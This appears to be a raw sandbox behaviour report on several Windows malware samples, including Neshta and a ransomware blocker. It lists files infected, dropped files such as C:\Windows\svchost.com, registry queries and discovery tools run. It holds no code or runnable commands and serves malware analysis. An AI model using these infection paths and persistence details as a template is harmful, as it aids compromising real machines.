| File opened for modification | C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateCore.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\QQOFCC\TSH.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\ipconfig.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\ipconfig.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\arp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Video\frame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\whoami.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-E~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\BACKDO~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-E~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\REG.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\route.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netstat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PortableDeviceSyncProvider\d3dramp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\SysWOW64\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
